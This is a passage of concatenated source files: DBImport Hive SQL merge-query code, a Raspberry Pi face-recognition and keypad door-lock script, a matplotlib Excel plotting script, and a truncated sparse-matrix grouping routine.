True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s'\"%(datalakeSource)\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_update`\"\n\t\t\tquery += \"\\nfrom %s \\n\"%(targetDBandTable)\n\t\t\tquery += \"where datalake_update = TIMESTAMP('%s') \\n\"%(mergeTime)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif sourceIsIncremental == False and targetDeleteDB != None and targetDeleteTable != None:\n\t\t\t# Start with truncating the History Delete table as we need to rebuild this one from scratch to determine what rows are deleted\n\t\t\tquery = \"truncate table %s\"%(targetDeleteDBandTable)\n\t\t\tself.executeSQLQuery(query)\n\n\t\t\t# Insert all rows (PK columns only) that exists in the Target Table but dont exists in the Import table (the ones that was deleted)\n\t\t\tquery = \"insert into table %s \\n(`\"%(targetDeleteDBandTable)\n\t\t\tquery += \"`, `\".join(PKColumns.split(\",\"))\n\t\t\tquery += \"`) \\nselect T.`\"\n\t\t\tquery += \"`, T.`\".join(PKColumns.split(\",\"))\n\t\t\tquery += \"` \\nfrom %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"left outer join %s as S \\n\"%(sourceDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\t\tfor i, targetColumn in enumerate(PKColumns.split(\",\")):\n\t\t\t\tsourceColumn = columnMerge.loc[columnMerge['Exist'] == 'both'].loc[columnMerge['targetName'] == targetColumn].iloc[0]['sourceName']\n\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\t\t\t\telse:\n\t\t\t\t\tquery += 
\"and\\n T.`%s` = S.`%s` \"%(targetColumn, sourceColumn)\n\n\t\t\tquery += \"\\nwhere \\n\"\n\n\t\t\tfor i, targetColumn in enumerate(PKColumns.split(\",\")):\n\t\t\t\tsourceColumn = columnMerge.loc[columnMerge['Exist'] == 'both'].loc[columnMerge['targetName'] == targetColumn].iloc[0]['sourceName']\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" S.`%s` is null \"%(sourceColumn)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n S.`%s` is null \"%(sourceColumn)\n\t\t\tquery += \"\\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif oracleFlashbackSource == True and createHistoryAudit == True:\n\t\t\t# If it is a history merge with Oracle Flashback, we need to handle the deletes separatly\t\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s'\"%(datalakeSource)\n\t\t\tquery += \",\\n `datalake_flashback_operation` as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s \\n\"%(oracleFlashbackImportDBandTable)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif mssqlChangeTrackingSource == True and createHistoryAudit == True and sourceIsIncremental == True:\n\t\t\t# We only run this of it's an incremental load, i.e CDT is working. 
Full load, falling over the edge and such should not load from import table but instead from target table\n\t\t\t# and that is handled above with the same code as full import with history is using\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s'\"%(datalakeSource)\n\t\t\tquery += \",\\n `datalake_mssql_changetrack_operation` as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s \"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tquery += \"\\nwhere datalake_mssql_changetrack_operation != 'D' \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\n\t\t\t# This query inserts the deleted rows, including all columns into the History table. 
\n\t\t\t# Without it, the column not part of the PK would not be available in History table\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" T.`%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s' as `datalake_source`\"%(datalakeSource)\n\t\t\tquery += \",\\n 'D' as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s as D \\n\"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tquery += \"inner join %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\t\t\tquery += \"\\nwhere D.datalake_mssql_changetrack_operation == 'D' \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\t\t# The last step is to delete the rows in the Target table based on what rows have D in the import table\n\t\t\tquery = \"merge into %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"using %s as D \\n\"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\t\t\tquery += \"\\n\"\n\t\t\tquery += \"and D.datalake_mssql_changetrack_operation == 'D' \\n\"\n\t\t\tquery += \"when matched then delete \\n\"\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\n\t\t# Insert the deleted rows into the History table. 
Without this, it's impossible to see what values the column had before the delete\n\t\tif sourceIsIncremental == False and createHistoryAudit == True and historyDB != None and historyTable != None and targetDeleteDB != None and targetDeleteTable != None:\n\t\t\tquery = \"insert into table %s \\n\"%(historyDBandTable) \n\t\t\tquery += \"( \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" `%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n `datalake_source`\"\n\t\t\tquery += \",\\n `datalake_iud`\"\n\t\t\tquery += \",\\n `datalake_timestamp`\"\n\t\t\tquery += \"\\n) \\n\"\n\n\t\t\tquery += \"select \"\n\t\t\tfirstIteration = True\n\t\t\tfor index, row in columnMerge.loc[columnMerge['Exist'] == 'both'].iterrows():\n\t\t\t\tif firstIteration == True:\n\t\t\t\t\tfirstIteration = False\n\t\t\t\t\tquery += \" \\n\"\n\t\t\t\telse:\n\t\t\t\t\tquery += \", \\n\"\n\t\t\t\tquery += \" T.`%s`\"%(row['targetName'])\n\t\t\tif datalakeSourceExists == True:\n\t\t\t\tquery += \",\\n '%s' as `datalake_source`\"%(datalakeSource)\n\t\t\tquery += \",\\n 'D' as `datalake_iud`\"\n\t\t\tquery += \",\\n timestamp('%s') as `datalake_timestamp`\"%(mergeTime)\n\t\t\tquery += \"\\nfrom %s as D \\n\"%(targetDeleteDBandTable)\n\t\t\tquery += \"left join %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tif sourceIsIncremental == False and targetDeleteDB != None and targetDeleteTable != None:\n\t\t\t# Use the merge command to delete found rows between the Delete Table and the History Table\n\t\t\tquery = \"merge into %s as T \\n\"%(targetDBandTable)\n\t\t\tquery += \"using %s as D \\n\"%(targetDeleteDBandTable)\n\t\t\tquery += \"on \\n\"\n\t\n\t\t\tfor i, column in enumerate(PKColumns.split(\",\")):\n\t\t\t\tif i == 0: \n\t\t\t\t\tquery += \" T.`%s` = D.`%s` \"%(column, column)\n\t\t\t\telse:\n\t\t\t\t\tquery += \"and\\n T.`%s` = D.`%s` \"%(column, column)\n\t\t\tif softDelete == True:\n\t\t\t\tquery += \"and\\n T.`datalake_delete` != 'D' \"\n\t\t\tquery += \"\\n\"\n\n\t\t\tif softDelete == False:\n\t\t\t\tquery += \"when matched then delete \\n\"\n\t\t\telse:\n\t\t\t\tquery += \"when matched then update set \\n\" \n\t\t\t\tquery += \"datalake_iud = 'D', \\n\" \n\t\t\t\tquery += \"datalake_update = timestamp('%s'), \\n\"%(mergeTime)\n\t\t\t\tquery += \"datalake_delete = timestamp('%s') \"%(mergeTime)\n\n\t\t\tif printSQLQuery == True:\n\t\t\t\tprint(\"==============================================================\")\n\t\t\t\tprint(query)\n\n\t\t\tself.executeSQLQuery(query)\n\n\t\tlogging.debug(\"Executing etl_operations.mergeHiveTables() - Finished\")\n\n","repo_name":"Middlecon/DBImport","sub_path":"bin/DBImportOperation/etl_operations.py","file_name":"etl_operations.py","file_ext":"py","file_size_in_byte":23452,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"20043549663","text":"import 
cv2\nimport numpy as np\nimport os \nimport RPi.GPIO as GPIO\nimport time\nfrom gpiozero import Servo, Buzzer, LED\nfrom signal import signal, SIGTERM, SIGHUP, pause\nfrom rpi_lcd import LCD\n\n\n# Set timer for face detection\ntimeout = time.time() + 60*0.33\n\nlcd = LCD()\n\nredLED = LED(27)\ngreenLED = LED(26)\n\nbuzzer = Buzzer(23)\n\n# Servo pin output at GPIO25\nservo = Servo(25)\n\nservo.mid()\n\ncnt = 0\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read('trainer/trainer.yml')\ncascadePath = \"haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascadePath);\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n#iniciate id counter\nid = 0\n\n# Setting names with their respective User ID\n# 0 1 2 3 4\nnames = ['None', 'Dhruval', 'Sahithi', 'Z', 'W'] \n\n# Initialize and start realtime video capture\ncam = cv2.VideoCapture(0)\ncam.set(3, 640) # set video widht\ncam.set(4, 480) # set video height\n\n# Define minimum window size to be recognized as a face\nminW = 0.1*cam.get(3)\nminH = 0.1*cam.get(4)\n\nlcd.clear()\nlcd.text(\"Bring your face\",1)\nlcd.text(\"near the camera\",2)\n\n# These are the GPIO pin numbers where the\n# lines of the keypad matrix are connected\nL1 = 5\nL2 = 6\nL3 = 13\nL4 = 19\n\n# These are the four columns\nC1 = 12\nC2 = 16\nC3 = 20\nC4 = 21\n\n# The GPIO pin of the column of the key that is currently\n# being held down or -1 if no key is pressed\nkeypadPressed = -1\n\n# Initializing passcode for entry\nsecretCode = \"1999\"\ninput = \"\"\n\n# Setup GPIO\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(L1, GPIO.OUT)\nGPIO.setup(L2, GPIO.OUT)\nGPIO.setup(L3, GPIO.OUT)\nGPIO.setup(L4, GPIO.OUT)\n\n# Use the internal pull-down resistors\nGPIO.setup(C1, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(C2, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(C3, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(C4, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# This callback registers the key that was pressed\n# if no other key is currently pressed\ndef keypadCallback(channel):\n global keypadPressed\n if keypadPressed == -1:\n keypadPressed = channel\n\n# Detect the rising edges on the column lines of the\n# keypad. This way, we can detect if the user presses\n# a button when we send a pulse.\nGPIO.add_event_detect(C1, GPIO.RISING, callback=keypadCallback)\nGPIO.add_event_detect(C2, GPIO.RISING, callback=keypadCallback)\nGPIO.add_event_detect(C3, GPIO.RISING, callback=keypadCallback)\nGPIO.add_event_detect(C4, GPIO.RISING, callback=keypadCallback)\n\n# Sets all lines to a specific state. 
This is a helper\n# for detecting when the user releases a button\ndef setAllLines(state):\n GPIO.output(L1, state)\n GPIO.output(L2, state)\n GPIO.output(L3, state)\n GPIO.output(L4, state)\n\ndef checkSpecialKeys():\n global input\n global cnt\n pressed = False\n\n GPIO.output(L3, GPIO.HIGH)\n\n if (GPIO.input(C4) == 1):\n print(\"\\nInput reset!\")\n lcd.clear()\n lcd.text(\"Input reset!\",1)\n lcd.text(\"Enter pin again!\",2)\n pressed = True\n\n GPIO.output(L3, GPIO.LOW)\n GPIO.output(L1, GPIO.HIGH)\n \n if (not pressed and GPIO.input(C4) == 1):\n \n cnt += 1\n \n # checking if the entered pin is the passcode\n if input == secretCode:\n print(\"\\nPin correct!\")\n servo.max()\n print(\"\\nDoor unlocked\")\n lcd.clear()\n lcd.text(\"Door unlocked...\",1)\n lcd.text(\" Welcome!\",2)\n buzzer.on()\n greenLED.on()\n time.sleep(1)\n buzzer.off()\n time.sleep(10)\n greenLED.off()\n servo.mid()\n print(\"\\n[INFO] Exiting program\")\n cam.release()\n cv2.destroyAllWindows()\n exit()\n \n else:\n print(\"\\nIncorrect pin! Please try again...\")\n lcd.clear()\n lcd.text(\"Incorrect pin!\",1)\n lcd.text(\"Please try again\",2)\n # giving three attempts to enter the correct pin\n # or else display the message for intruders\n if cnt > 2 :\n print(\"\\nINTRUDER ALERT!!!\")\n print(\"\\nMaximum attempts reached\")\n lcd.clear()\n lcd.text(\"Maximum attempts\",1)\n lcd.text(\"INTRUDER ALERT!!!\",2)\n buzzer.beep()\n redLED.on()\n time.sleep(10)\n redLED.off()\n print(\"\\n[INFO] Exiting program\")\n cam.release()\n cv2.destroyAllWindows()\n exit()\n \n pressed = True\n GPIO.output(L3, GPIO.LOW)\n\n if pressed:\n input = \"\"\n\n return pressed\n \n\n# reads the columns and appends the value, that corresponds\n# to the button, to a variable\ndef readLine(line, characters):\n global input\n # We have to send a pulse on each line to\n # detect button presses\n GPIO.output(line, GPIO.HIGH)\n if(GPIO.input(C1) == 1):\n input = input + characters[0]\n if(GPIO.input(C2) == 1):\n input = input + characters[1]\n if(GPIO.input(C3) == 1):\n input = input + characters[2]\n if(GPIO.input(C4) == 1):\n input = input + characters[3]\n GPIO.output(line, GPIO.LOW)\n \n# Function to do tasks after face detection \ndef faceDetected() :\n cv2.destroyAllWindows()\n print(\"\\nDoor unlocked\")\n lcd.clear()\n lcd.text(\"Face detected!\",1)\n buzzer.on()\n time.sleep(1)\n buzzer.off()\n time.sleep(2)\n servo.max()\n greenLED.on()\n lcd.clear()\n lcd.text(\"Door unlocked...\",1)\n lcd.text(\" Welcome!\",2)\n time.sleep(10)\n greenLED.off()\n servo.mid()\n print(\"\\n[INFO] Exiting program\")\n cam.release()\n cv2.destroyAllWindows()\n exit()\n \ndef safe_exit(signum, frame):\n exit(1)\n\nsignal(SIGTERM, safe_exit)\nsignal(SIGHUP, safe_exit)\n \n \ntry :\n while True:\n \n test = 0\n\n ret, img =cam.read()\n img = cv2.flip(img, -1) # Flip vertically\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor = 1.2,\n minNeighbors = 5,\n minSize = (int(minW), int(minH)),\n )\n\n for(x,y,w,h) in faces:\n\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\n\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\n\n # Check if confidence is less than 100 ==> \"0\" is perfect match \n if (confidence < 100):\n id = names[id]\n confidence = \" {0}%\".format(round(100 - confidence))\n faceDetected()\n else:\n id = \"unknown\"\n confidence = \" {0}%\".format(round(100 - confidence))\n \n cv2.putText(img, str(id), (x+5,y-5), font, 1, (255,255,255), 2)\n cv2.putText(img, 
str(confidence), (x+5,y+h-5), font, 1, (255,255,0), 1) \n \n cv2.imshow('Face detection camera',img) \n\n k = cv2.waitKey(10) & 0xff # Press 'ESC' for exiting video\n if k == 27 or test == 0.33 or time.time() > timeout:\n break\n test = test - 1\n \n# keypad passcode entry after face not detected \n cv2.destroyAllWindows()\n cam.release()\n lcd.clear()\n lcd.text(\"Face undetected!\",1)\n buzzer.on()\n time.sleep(1)\n buzzer.off()\n redLED.on()\n time.sleep(5)\n redLED.off()\n print(\"\\nEnter password:\")\n lcd.clear()\n lcd.text(\"Enter password\",1)\n lcd.text(\"on the keypad\",2)\n \n while True :\n # If a button was previously pressed,\n # check, whether the user has released it yet\n if keypadPressed != -1:\n setAllLines(GPIO.HIGH)\n if GPIO.input(keypadPressed) == 0:\n keypadPressed = -1\n else:\n time.sleep(0.1)\n # Otherwise, just read the input\n else:\n if not checkSpecialKeys():\n readLine(L1, [\"1\",\"2\",\"3\",\"A\"])\n readLine(L2, [\"4\",\"5\",\"6\",\"B\"])\n readLine(L3, [\"7\",\"8\",\"9\",\"C\"])\n readLine(L4, [\"*\",\"0\",\"#\",\"D\"])\n time.sleep(0.1)\n else:\n time.sleep(0.1)\n\n# Do a bit of cleanup\nexcept KeyboardInterrupt:\n print(\"\\n[INFO] Exiting program\")\n lcd.clear()\n lcd.text(\" Goodbye!\",1)\n time.sleep(5)\n cam.release()\n cv2.destroyAllWindows()\n \nfinally:\n lcd.clear()","repo_name":"DhruvalShah199/Facial-Recognition-Door-Lock","sub_path":"Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41914519416","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nfrom matplotlib import pyplot as plt\nfrom pylab import figure, show, plt\nimport xlrd\n\ndebug = 1\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef get_data(xlspath, shtindx=0):\n xls = xlrd.open_workbook(xlspath)\n sheet = xls.sheets()[shtindx]\n m = sheet.nrows # 行数\n l = sheet.ncols # 列数\n sheetname = sheet.cell_value(0, 0)\n col_names = sheet.row_values(1)\n print(col_names)\n datasss = {}\n for i in range(len(col_names)):\n # 将字段和对应值组成字典\n datasss[col_names[i]] = sheet.col_values(i)[2:]\n datasss['sheet_name'] = sheetname\n datasss['n_rows'] = m\n datasss['n_cols'] = l\n datasss['col_names'] = sheet.row_values(1)\n for key in datasss:\n if debug:\n print(key, '=', datasss[key])\n return datasss\n\n\ndef draw(data_dic):\n global x\n # d = get_data(xls, index)\n col_names = data_dic['col_names']\n\n figname = data_dic['sheet_name']\n fig = figure(figsize=(16, 8), dpi=80)\n\n ax = fig.add_subplot(1, 1, 1)\n # x = [i for i in range(xlen)]\n point = ['b.-', 'r.-', 'g.-', 'k.-', 'c.-', 'm.-', 'y.-', 'b^-']\n\n xname = col_names[0]\n x = [int(i) for i in data_dic[xname]]\n xlen = len(x)\n for i in range(1, len(col_names)):\n # 排除作为横轴标签的数据列,从第二列开始画图\n y = [n for n in data_dic[col_names[i]]]\n # point[i] = point[i][:2]\n ax.plot(x, y, point[i], label=col_names[i], linewidth=0.1)\n ax.set_xlabel(xname)\n # ax.set_xticks([0, int(0.2*xlen), int(0.4*xlen), int(0.6*xlen), int(0.8*xlen), xlen])\n ax.set_xticks([int(i/10*xlen) for i in range(0, 12, 2)])\n # ax.set_xticklabels([x[0]] + [x[int(i/10*xlen)] for i in range(2, 10, 2)] + [x[-1]+1])\n # ax.set_xticklabels([x[0], x[int(0.2*xlen)], x[int(0.4*xlen)], x[int(0.6*xlen)], x[int(0.8*xlen)], x[xlen-1]])\n ax.set_ylabel('当前重量值')\n ax.set_title(figname)\n ax.legend() # 图例\n ax.grid() # 网格\n\n\nif __name__ == '__main__':\n # xls_path = r\"E:\\流程17\\WE_测试流程-余发荣-2017-09-08 
称重模块功能修改测试\\测��\\ModbusPoll 数据采集\\2wt 零点 默认.xlsx\"\n # col_name = u'当前平均重量'\n # xls_path = r\"E:\\Redmine-任务\\四路型BD模块(有壳)测试239\\测试\\水壶加热测温实验数据8路1.xls\"\n # xls_path = r\"E:\\Redmine\\20180503 李为 两路型BD板模块(有壳)LX3V-2PTS-BD_V1.2\\PID验证实验\\绘图.xls\"\n xls_path = r\"P:\\FAN_SHARED\\201805 v-box版本测试遗留问题处理\\测试结果\\不同方式上电启动耗时_新方式\\不同方式上电启动耗时整理.xlsx\"\n # sheet_index = 0\n # col_str = r'跟踪间隔0不启用 跟踪间隔1 跟踪间隔1000 跟踪间隔10000 跟踪间隔20000'\n # col_str = r'跟踪范围0 跟踪范围5 跟踪范围20 跟踪范围50 跟踪范围100'\n # col_str = r'稳定检查时间0(1) 稳定检查时间1 稳定检查时间200 稳定检查时间500 稳定检查时间1000'\n # col_str = r'检查范围0/1 检查范围5 检查范围20 检查范围50 检查范围100'\n # col_str = r'2PT2DAV-1\t2PT2DAV-2\t2PT2ADV-1\t2PT2ADV-2\t4PT-1\t4PT-2\t4PT-3\t4PT-4'\n d = get_data(xls_path)\n draw(d)\n show()\n","repo_name":"wwkkww1983/pythonwork","sub_path":"matplotlib/read_xls_to_draw.py","file_name":"read_xls_to_draw.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40568195999","text":"import numpy as np\nfrom mosek_test import *\nfrom utils import *\n\n\n\ndef flatten(xss):\n return [x for xs in xss for x in xs]\n\n\ndef sop_mining(A, row_panel_size):\n n = A.shape[0]\n cnt = 0\n T = np.zeros((n, A.shape[1], 4))\n for i in range(n):\n for j in range(A.shape[1]):\n T[i, j, 0] = i\n T[i, j, 1] = j\n T[i, j, 2] = A[i, j]\n if A[i, j] != 0:\n T[i, j, 3] = cnt\n cnt = cnt + 1\n groups, groups_2d, group_nz, groups_cols, groups_val = [], [], [], [], []\n num_panels = int(n/row_panel_size)\n for i in range(0, num_panels):\n groups_2d.append([])\n mat = A[i*row_panel_size:(i+1)*row_panel_size, :]\n for j in range(A.shape[1]):\n if np.sum(np.ravel(mat[:, j])) != 0:\n tmp = take_nonzeros(T[i*row_panel_size:(i+1)*row_panel_size,j, 2], T[i*row_panel_size:(i+1)*row_panel_size,j, 0])\n tmp_col = take_nonzeros(T[i*row_panel_size:(i+1)*row_panel_size,j, 2], T[i*row_panel_size:(i+1)*row_panel_size,j, 1])\n tmp_nz = take_nonzeros(T[i*row_panel_size:(i+1)*row_panel_size,j, 2], T[i*row_panel_size:(i+1)*row_panel_size,j, 3])\n groups.append(tmp)\n groups_cols.append(tmp_col)\n groups_2d[i].append(tmp)\n group_nz.append(tmp_nz)\n\n return groups, groups_2d, group_nz, (np.array(flatten(groups_cols)),\n np.array(flatten(groups)))\n\n\ndef padding_blas_cost(pnt_grp1, pnt_grp2, op_to_idx):\n blas_grp = []\n min_x, min_y = 1e20, 1e20\n max_x, max_y = 0, 0\n merged_grp = list(set(pnt_grp1 + pnt_grp2))\n for pnt in merged_grp:\n x_coo = op_to_idx[0][pnt]\n y_coo = op_to_idx[1][pnt]\n min_x = np.min((x_coo, min_x))\n min_y = np.min((y_coo, min_y))\n max_x = np.max((x_coo, max_x))\n max_y = np.max((y_coo, max_y))\n cost_grp = (max_x-min_x+1) * (max_y-min_y+1) - len(merged_grp)\n return blas_grp, cost_grp\n\n\ndef padding_sop_cost(pnt_grp1, pnt_grp2, op_to_idx):\n blas_grp = []\n l1 = len(pnt_grp1)\n l2 = len(pnt_grp2)\n merged_grp_l = len(list(set(pnt_grp1 + pnt_grp2)))\n cost_grp = merged_grp_l / (l1+l2)\n return blas_grp, cost_grp\n\n\ndef pair_group_cost(grp1, grp2):\n blas_grp = []\n l1 = grp1.get_num_op()\n l2 = len(grp2)\n merged_grp_l = len(list(set(grp1 + grp2)))\n cost_grp = merged_grp_l / (l1+l2)\n return blas_grp, cost_grp\n\n\ndef BLAS_padding(codelet_groups, operation_to_coordinate, psc_enabled):\n grp_no = len(codelet_groups)\n grp_mat = np.zeros((grp_no, grp_no))\n for i in range(grp_no):\n for j in range(i, grp_no):\n if psc_enabled:\n [gr, cst] = padding_blas_cost(codelet_groups[i], codelet_groups[j],\n operation_to_coordinate)\n else:\n [gr, cst] = padding_sop_cost(codelet_groups[i], 
